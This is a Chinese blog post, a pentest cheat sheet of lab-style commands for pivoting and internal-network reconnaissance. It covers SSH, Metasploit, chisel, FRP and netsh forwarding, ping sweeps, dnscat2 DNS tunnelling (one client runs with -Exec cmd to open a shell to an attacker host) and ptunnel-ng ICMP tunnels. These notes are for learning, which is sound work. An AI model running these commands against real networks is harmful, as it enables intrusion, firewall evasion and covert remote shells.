渗透测试--隧道搭建&内网探测

最新推荐文章于 2025-05-18 17:11:16 发布
最新推荐文章于 2025-05-18 17:11:16 发布
阅读量696 收藏 13
点赞数 7
CC 4.0 BY-SA版权
文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44368093/article/details/144683291

作者的掏心话

    该系列名为  渗透测试-XXXX    

    该系列都是比较基础的内容,如各位没找到自己想要的内容,小编给各位赔不是了。
    该系列是以俺日常学习笔记为数据基础,所整理出来的使用手册。该系列希望能够做到成为渗透测试时的帮助手册,提醒渗透的思路、渗透工具的具体使用等内容,以免各位在互联网再不断翻找。由于互联网的内容良莠不齐,俺可保证收集到的内容均经过验证,所以请放心食用。

ssh 搭建socks5代理

ssh -D 1080  -f  user@10.129.x.x -N

ssh 正向端口转发

ssh -L 4444:localhost:3306 user@10.129.x.x

设置多个端口转发 

ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

 ssh反向端口转发

ssh -R <中间者IP>:8080:0.0.0.0:8000 ubuntu@<中间这IP> -vN

proxychains代理攻击机工具

proxychains nmap -sT -sV -sC -Pn 10.10.1.17

代理主机cmd探测其他网段

for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

 代理主机powershell探测其他网段

1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

 msf搭建代理

msf6 > use auxiliary/server/socks_proxy

 查看msf代理情况

msf6 auxiliary(server/socks_proxy) > jobs

msf 进行网段存活扫描 

post/multi/gather/ping_sweep

 msf创建代理路由

msf6 > use post/multi/manage/autoroute

msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run
meterpreter > run autoroute -s 172.16.5.0/23

msf展示路由表

meterpreter > run autoroute -p

 msf端口转发选项表

meterpreter > help portfwd

Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.
    -R        Indicates a reverse port forward.

 msf创建正向端口转发

        创建本地3300端口 --> 远程主机 172.16.5.19的3389端口的道路

meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19

 msf创建反向端口转发

        创建shell主机的1234端口 --> 10.10.14.18的8081端口

meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

 socat 端口转发

        socat将本地的8080端口流量 -->发送给10.10.14.18:80

socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

        socat将8080端口流量 --> 发给172.16.5.19

socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

plink 工具让我们在Windows使用ssh

plink -ssh -D 9050 ubuntu@10.129.15.50
sshuttle -r username@remote_host --ssh-cmd 'ssh -i /path/to/private/key' 0.0.0.0/0

 sshuttle工具创建枢纽

        sshuttle可以说是最方便的工具了,但是我们有必要了解他的原理,因为如果使用不当他可能会对我们的系统造成伤害。sshuttle是结合ssh和iptables来完成的透明代理工具,iptables控制者网络的转发情况,而sshuttle会对iptables进行调整,所以使用的时候请确保sshuttle工具不会干死咱们得iptables。

        通过中继机器10.129.202.64创建动态端口转发,转发送往172.16.5.0/23的流量。

 sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

sshuttle工具通过id_rsa创建枢纽

sshuttle -r username@remote_host --ssh-cmd 'ssh -i /path/to/private/key' 0.0.0.0/0

FRP开启穿透代理

开启frpc

./frpc -c frpc.ini

开启frps

./frps -c frps.ini

frpc.ini

[common]
server_addr = 10.10.16.233
server_port = 7000

[socks5]
type = tcp
local_ip = 127.0.0.1            # 本地 SOCKS5 服务 IP
local_port = 1080               # 本地监听的 SOCKS5 端口
remote_port = 7080              # 暴露在服务器端的端口
plugin = socks5

frps.ini

[common]
bind_port = 7000
dashboard_port = 7500

netsh.exe在Windows主机开启隧道

C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
C:\Windows\system32> netsh.exe interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.42.198   8080        172.16.5.25     3389

dnscat2搭建dns隧道服务器

sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

 linux dnscat2客户端开启dns隧道

./dnscat --secret=0ec04a91cd1e963f8c03ca499d589d21 inlanefreight.local

powershell dnscat2客户端开启dns隧道

PS C:\htb> Import-Module .\dnscat2.ps1
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

Chisel搭建动态端口转发socks5服务器

        在受害机器开启1234端口作为socks5服务

./chisel server -v -p 1234 --socks5

         在攻击机链接1234端口获取本地代理为1080

./chisel client -v 10.129.202.64:1234 socks

2022/05/05 14:21:18 client: Connecting to ws://10.129.202.64:1234
2022/05/05 14:21:18 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2022/05/05 14:21:18 client: tun: Bound proxies
2022/05/05 14:21:19 client: Handshaking...
2022/05/05 14:21:19 client: Sending config
2022/05/05 14:21:19 client: Connected (Latency 120.170822ms)
2022/05/05 14:21:19 client: tun: SSH connected

chisel搭建动态端口转发socks5服务器(反向)

        攻击机监听1234端口,等待chiselclient链接穿件动态端口转发

sudo ./chisel server --reverse -v -p 1234 --socks5

        受害机链接攻击机的1234端口,并使用反向代理开启功能

./chisel client -v 10.10.14.17:1234 R:socks

ptunnel-ng搭建端口转发服务器

        受害机开启端口转发服务,将10.129.202.64的22端口准备开启转发

sudo ./ptunnel-ng -r10.129.202.64 -R22

        攻击机链接ptunnel-ng服务器,并将转发流量端口绑定于攻击机2222端口

sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

ptunnel-ng隐藏流量为ICMP

        将端口转发流量走绑定与ping隧道的2222端口

ssh -D 9050 -p2222 -lubuntu 127.0.0.1

SocksOverRDP搭建Windows动态端口转发代理

C:\Users\htb-student\Desktop\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll

接着使用mstsc.exe访问远程主机,这里相当于在本机开启了服务器

 

接着将SocksOverRDP-server发送到远程主机,然后运行它

那么本机上面的1080端口就开启成功了


C:\Users\htb-student\Desktop\SocksOverRDP-x64> netstat -antb | findstr 1080
  TCP    127.0.0.1:1080         0.0.0.0:0              LISTENING

Windows挂代理

使用Proxifier就可以了,这里就不多讲这个了,我相信各位肯定会用。 

提升RDP远程性能

        如果用起来不舒服,那就使用

瘾大侠
关注
内网穿透从搭建到溯源(内网隧道搭建、绕过、隧道流量分析、日志分析、隧道防护)
墨痕诉清风的博客
02-24 4783
背景 在攻防博弈这个永久的话题中,永远不会缺少一个重要角色即内网穿透。当渗透测试人员在进入内网,需要扩大战果的时候,往往会遇到内网的一些防护策略,不外乎边界设备、防火墙及入侵检测设备对端口或者数据包的拦截,导致流量无法出网,此时就需要熟练掌握内网穿透技术,从复杂的内网环境中获取稳定的流量交互,从而达到目的。 本文针对边界安全设备等对内网端口的屏蔽及数据包的拦截,从不同的网络协议层进行搭建隧道进行绕过,并对不同类型的隧道流量或者日志进行分析,帮助攻击或防守人员从溯源的维度更好的掌握内网穿透技术。 .
Windows - SMB 远程代码执行漏洞(永恒之蓝) - CVE-2017-0146 & MS17-010
Blue17 の 小窝
03-22 1378
永恒之蓝漏洞(MS 17-010、
SSH端口22完全沦陷:5个步骤渗透测试全过程
qq_41314882的博客
03-10 1474
SSH(Secure Shell)是一种用于在不安全网络上建立安全连接的协议,主要用于远程服务器管理。由于 SSH 端口。
渗透测试常用工具-ptunnel内网穿透
5L2g556F5ZWl77yf
02-20 3735
内网穿透又叫NAT穿透,局域网内计算机要向外网进行通信就得通过nat转发,而内网穿透就是跳过nat直接进入内网ptunnel 在一些网络环境中,如果不经过认证,TCP和UDP数据包都会被拦截。如果用户可以ping通远程计算机,就可以尝试建立ICMP隧道,将TCP数据通过该隧道发送,实现不受限的网络访问。用户需要在受限制网络之外,预先启动该工具建立代理服务器。再以客户端模式运行该工具,就可以建立...
隧道工具ptunnle
分享学习网络的点点滴滴
10-09 468
通过ICMP echo(ping requests)和reply(ping reply)实现隧道ptunnel直到目前的最新版仍存在拒绝服务漏洞,最新版本为0.72。适用于防火墙只允许ping出站流量的环境。支持多并发连接,性能优。
ptunnel详细使用教程
热门推荐
星落的博客
05-16 2万+
ptunnle简介 适用条件 ptunnle常用命令 实例演示-传输数据
ICMP隐蔽隧道工具Pingtunnel搭建隧道(附搭建环境避坑超详细)
huayimy的博客
01-02 2745
服务端(中间跳板机):192.168.19.21(lan区段) & 192.168.203.144(nat模式)提前检查被控机win7的远程连接是否为开启状态,确认开启后,使用windows自带的远程桌面进行连接。在安装PingTunnel前,我们必须先要安装它的运行环境,否则安装失败。一台服务端(linux服务端,用于内网中转,lan区段+nat模式)一台客户端(kali攻击机,lan区段)一台远控机器(win7,lan区段)-da:指定要转发的目标机器的IP。一台靶机(win7,nat模式)
渗透测试-红日靶场四
konglong12311的博客
05-29 1484
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
内网渗透之---PingTunnel怎么耍
Armandhe的博客
06-21 1815
内网渗透不得不说的秘密
红队内网攻防渗透:内网渗透之内网对抗:隧道技术篇&防火墙组策略&ICMP&DNS&SMB协议&出网判断&C2上线&解决方案
HACKONE的博客
06-21 565
ICMP 通过 PING 命令访问远程计算机,建立 ICMP 隧道,将 TCP/UDP 数据封装到 ICMP 的 PING 数据包中,从而穿过防火墙,防火墙一般不会屏蔽 PING 数据包,实现不受限制的访问。添加新的A记录 这里按照C2重新新建一个主机记录将C2.xiaodi8.com指向我们的CS服务器地址。现在成功上线了web,但是要使用web服务器访问2.22的网站访问不了,出站是允许icmp。利用各种隧道技术,以网络防火墙允许的协议,绕过网络防火墙的封锁,实现访问被封锁的目标网络。
渗透测试核心技术:内网渗透与横向移动
最新发布
2402_86373248的博客
05-18 742
内网渗透是红队行动的关键阶段,攻击者通过突破边界进入内网后,需快速定位域控、横向移动并维持权限。本节从内网环境搭建、信息收集、横向移动技巧到权限维持工具,系统讲解如何在内网中隐蔽行动并扩大战果。
icmp隧道工具之ptunnel使用
songling515010475的专栏
06-10 1202
ptunnel工具使用
代理转发与隧道应用
RestoreJustice的博客
05-07 3471
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
icmp隧道的利用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 8308
icmp隧道的利用
内网安全-隧道技术
tj2718647721的博客
08-16 264
--利用webshell在靶机上传cmd或者shell后门,但是靶机对tcp/HTTP等协议有防护拦截,无论是正向还是反向连接都不行---隧道的作用就是伪装协议,将原本的shell(TCP)加报头进行封装,通过靶机拦截后,再去连接---1.网络层(ICMP):利用pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具;
ICMP隧道学习(ptunnel学习)
痴人说梦梦中人
11-13 1001
web还没学好就来学内网穿透,有越阶嫌疑,仅做个了解。网传有各种ICMP隧道版本的博文,但我发现看的越多越是凌乱,还是要自己做测试理解才好。总之一句话:把TCP流量封装在ICMP报文中进行传输的一种技术。ptunnel参考链接。 一、 环境搭建 三个Debian的kali虚拟机,其实都是一个虚拟机克隆出来的,环境也都是一个网段,主要是懒。按步骤配置即可,注意要先在跳板机开启ptunnel,然后攻击...
PingTunnel(ptunnel)源码分析与性能改进
天笑的博客
08-20 1054
这里写自定义目录标题PingTunnel(ptunnel)源码分析与性能改进主要问题问题1:ACK包响应太慢及发包太快导致传输受限解决方法问题2:发送方CPU 100%问题解决方案问题3:连接有时会挂掉解决方案未来的改进展望 PingTunnel(ptunnel)源码分析与性能改进 PingTunnel是用于内网穿透的工具,近期用到它,发现了不少问题,做了一些改进,记录于此。 这个工具大概是2004年左右由Daniel创建,之后维护到2011年左右,支持通过ICMP或DNS(UDP)通道做隧道传输TCP报文
流控>>>ping隧道 >>>  ptunnel
qq726232111的博客
10-12 857
ping隧道 &gt;&gt;&gt; ptunnel ptunnel 测试版本 0.72 最新版本 ptunnel-ng 1.42 Ptunnel-ng是的Ptunnel的bug修复和重构版本,以及额外添加了一些的功能 github &gt;&gt;&gt; https://github.com/lnslbrty/ptunnel-ng ...
ptunnel-ng 项目推荐
gitblog_00591的博客
11-20 438
ptunnel-ng 项目推荐 项目基础介绍和主要编程语言 ptunnel-ng 是一个基于 ICMP 协议的 TCP 隧道工具,它是原始 ptunnel 项目的改进版本。该项目的主要编程语言是 C,适用于需要在网络环境中通过 ICMP 数据包传输 TCP 流量的场景。 项目核心功能 ptunnel-ng 的核心功能包括: TCP 隧道:通过 ICMP 数据包建立可靠的 TCP 连接隧道,允许用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值